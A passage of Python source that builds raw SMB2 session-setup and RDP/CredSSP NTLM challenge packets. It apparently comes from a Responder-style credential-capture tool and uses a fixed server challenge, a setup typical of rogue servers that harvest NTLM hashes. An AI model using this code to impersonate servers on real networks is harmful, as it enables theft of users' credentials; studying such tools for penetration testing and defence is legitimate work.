nalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
|
|
|
|
AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
|
|
AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
|
|
MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])
|
|
|
|
Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
|
|
|
|
#Packet Struct len
|
|
self.fields["Len"] = StructWithLenPython2or3("<h",len(StructLen)+1)
|
|
#Sec Blob lens
|
|
self.fields["SecBlobOffSet"] = StructWithLenPython2or3("<h",len(StructLen)+64)
|
|
self.fields["SecBlobLen"] = StructWithLenPython2or3("<h",len(SecBlobLen))
|
|
#ASN Stuff
|
|
self.fields["InitContextTokenASNLen"] = StructWithLenPython2or3("<B", len(SecBlobLen)-2)
|
|
self.fields["ThisMechASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["ThisMechASNStr"])))
|
|
self.fields["SpNegoTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2))
|
|
self.fields["NegTokenASNLen"] = StructWithLenPython2or3("<B", len(AsnLen2)-2)
|
|
self.fields["NegTokenTag0ASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen))
|
|
self.fields["NegThisMechASNLen"] = StructWithLenPython2or3("<B", len(MechTypeLen)-2)
|
|
#self.fields["NegThisMech1ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech1ASNStr"])))
|
|
self.fields["NegThisMech2ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech2ASNStr"])))
|
|
self.fields["NegThisMech3ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech3ASNStr"])))
|
|
self.fields["NegThisMech4ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech4ASNStr"])))
|
|
self.fields["NegThisMech5ASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegThisMech5ASNStr"])))
|
|
self.fields["NegTokenTag3ASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len))
|
|
self.fields["NegHintASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len)-2)
|
|
self.fields["NegHintTag0ASNLen"] = StructWithLenPython2or3("<B", len(Tag3Len)-4)
|
|
self.fields["NegHintFinalASNLen"] = StructWithLenPython2or3("<B", len(str(self.fields["NegHintFinalASNStr"])))
|
|
|
|
class SMB2Session1Data(Packet):
|
|
fields = OrderedDict([
|
|
("Len", "\x09\x00"),
|
|
("SessionFlag", "\x00\x00"),
|
|
("SecBlobOffSet", "\x48\x00"),
|
|
("SecBlobLen", "\x06\x01"),
|
|
("ChoiceTagASNId", "\xa1"),
|
|
("ChoiceTagASNLenOfLen", "\x82"),
|
|
("ChoiceTagASNIdLen", "\x01\x02"),
|
|
("NegTokenTagASNId", "\x30"),
|
|
("NegTokenTagASNLenOfLen","\x81"),
|
|
("NegTokenTagASNIdLen", "\xff"),
|
|
("Tag0ASNId", "\xA0"),
|
|
("Tag0ASNIdLen", "\x03"),
|
|
("NegoStateASNId", "\x0A"),
|
|
("NegoStateASNLen", "\x01"),
|
|
("NegoStateASNValue", "\x01"),
|
|
("Tag1ASNId", "\xA1"),
|
|
("Tag1ASNIdLen", "\x0c"),
|
|
("Tag1ASNId2", "\x06"),
|
|
("Tag1ASNId2Len", "\x0A"),
|
|
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
("Tag2ASNId", "\xA2"),
|
|
("Tag2ASNIdLenOfLen", "\x81"),
|
|
("Tag2ASNIdLen", "\xE9"),
|
|
("Tag3ASNId", "\x04"),
|
|
("Tag3ASNIdLenOfLen", "\x81"),
|
|
("Tag3ASNIdLen", "\xE6"),
|
|
("NTLMSSPSignature", "NTLMSSP"),
|
|
("NTLMSSPSignatureNull", "\x00"),
|
|
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
("NTLMSSPNtWorkstationLen","\x1e\x00"),
|
|
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
|
|
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
|
|
("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
|
|
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("NTLMSSPNtTargetInfoLen","\x94\x00"),
|
|
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
|
|
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionHigh","\x06"),
|
|
("NegTokenInitSeqMechMessageVersionLow","\x03"),
|
|
("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"),
|
|
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
|
|
("NTLMSSPNtWorkstationName",settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsUnicodeStr",settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr",settings.Config.MachineName),
|
|
("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr",settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr",settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",SMBTime()),
|
|
("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
|
|
])
|
|
|
|
|
|
def calculate(self):
|
|
###### Convert strings to Unicode
|
|
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
|
|
#Packet struct calc:
|
|
StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
|
|
###### SecBlobLen Calc:
|
|
CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
|
|
AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
|
|
|
|
#Packet Struct len
|
|
self.fields["Len"] = StructWithLenPython2or3("<h",len(StructLen)+1)
|
|
self.fields["SecBlobLen"] = StructWithLenPython2or3("<H", len(AsnLen+CalculateSecBlob))
|
|
self.fields["SecBlobOffSet"] = StructWithLenPython2or3("<h",len(StructLen)+64)
|
|
|
|
###### ASN Stuff
|
|
if len(CalculateSecBlob) > 255:
|
|
self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">H", len(CalculateSecBlob))
|
|
else:
|
|
self.fields["Tag3ASNIdLenOfLen"] = "\x81"
|
|
self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob))
|
|
|
|
if len(AsnLen+CalculateSecBlob)-3 > 255:
|
|
self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">H", len(AsnLen+CalculateSecBlob)-4)
|
|
else:
|
|
self.fields["ChoiceTagASNLenOfLen"] = "\x81"
|
|
self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-3)
|
|
|
|
if len(AsnLen+CalculateSecBlob)-7 > 255:
|
|
self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">H", len(AsnLen+CalculateSecBlob)-8)
|
|
else:
|
|
self.fields["NegTokenTagASNLenOfLen"] = "\x81"
|
|
self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-7)
|
|
|
|
tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
|
|
|
|
if len(tag2length) > 255:
|
|
self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">H", len(tag2length))
|
|
else:
|
|
self.fields["Tag2ASNIdLenOfLen"] = "\x81"
|
|
self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">B", len(tag2length))
|
|
|
|
self.fields["Tag1ASNIdLen"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
|
|
self.fields["Tag1ASNId2Len"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2Str"])))
|
|
|
|
###### Workstation Offset
|
|
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
|
|
###### AvPairs Offset
|
|
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
|
|
##### Workstation Offset Calculation:
|
|
self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation))
|
|
self.fields["NTLMSSPNtWorkstationLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtWorkstationMaxLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
|
|
##### Target Offset Calculation:
|
|
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtTargetInfoLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
self.fields["NTLMSSPNtTargetInfoMaxLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
|
|
##### IvPair Calculation:
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
|
|
class SMB2Session2Data(Packet):
|
|
fields = OrderedDict([
|
|
("Len", "\x09\x00"),
|
|
("SessionFlag", "\x00\x00"),
|
|
("SecBlobOffSet", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
|
|
###################RDP Packets################################
|
|
class TPKT(Packet):
|
|
fields = OrderedDict([
|
|
("Version", "\x03"),
|
|
("Reserved", "\x00"),
|
|
("Length", "\x00\x24" ),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["Length"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+4)#Data+own header.
|
|
|
|
class X224(Packet):
|
|
fields = OrderedDict([
|
|
("Length", "\x0e"),
|
|
("Cmd", "\xd0"),
|
|
("Dstref", "\x00\x00"),
|
|
("Srcref", "\x12\x34"),
|
|
("Class", "\x00"),
|
|
("Data", "")
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["Length"] = StructWithLenPython2or3(">B",len(str(self.fields["Data"]))+6)
|
|
|
|
|
|
class RDPNEGOAnswer(Packet):
|
|
fields = OrderedDict([
|
|
("Cmd", "\x02"),
|
|
("Flags", "\x00"),
|
|
("Length", "\x08\x00"),
|
|
("SelectedProto", "\x02\x00\x00\x00"),#CredSSP
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["Length"] = StructWithLenPython2or3("<h",8)
|
|
|
|
|
|
class RDPNTLMChallengeAnswer(Packet):
|
|
fields = OrderedDict([
|
|
|
|
("PacketStartASN", "\x30"),
|
|
("PacketStartASNLenOfLen", "\x81"),
|
|
("PacketStartASNStr", "\x01"), #Len of what follows... in this case, +20 since it's x81 lengths are >B
|
|
("PacketStartASNTag0", "\xa0"),
|
|
("PacketStartASNTag0Len", "\x03"), #Static for TSVersion
|
|
("PacketStartASNTag0Len2", "\x02"),
|
|
("PacketStartASNTag0Len3", "\x01"),
|
|
("PacketStartASNTag0CredSSPVersion", "\x05"),##TSVersion: Since padding oracle, v2,v3,v4 are rejected by win7..
|
|
("ParserHeadASNID1", "\xa1"),
|
|
("ParserHeadASNLenOfLen1", "\x81"),
|
|
("ParserHeadASNLen1", "\xfa"),
|
|
("MessageIDASNID", "\x30"),
|
|
("MessageIDASNLen", "\x81"),
|
|
("MessageIDASNLen2", "\xf7"),
|
|
("OpHeadASNID", "\x30"),
|
|
("OpHeadASNIDLenOfLen", "\x81"),
|
|
("OpHeadASNIDLen", "\xf4"),
|
|
("StatusASNID", "\xa0"),
|
|
("MatchedDN", "\x81"),
|
|
("ASNLen01", "\xf1"),
|
|
("SequenceHeader", "\x04"),
|
|
("SequenceHeaderLenOfLen", "\x81"),
|
|
("SequenceHeaderLen", "\xee"),
|
|
#######
|
|
("NTLMSSPSignature", "NTLMSSP"),
|
|
("NTLMSSPSignatureNull", "\x00"),
|
|
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
|
|
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
|
|
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
|
|
("NTLMSSPNtNegotiateFlags", "\x15\x82\x8a\xe2"),
|
|
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
|
|
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
|
|
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
|
|
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
|
|
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
|
|
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
|
|
("NTLMSSPNtWorkstationName", settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName),
|
|
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
###### Convert strings to Unicode first
|
|
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
|
|
###### Workstation Offset
|
|
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
###### AvPairs Offset
|
|
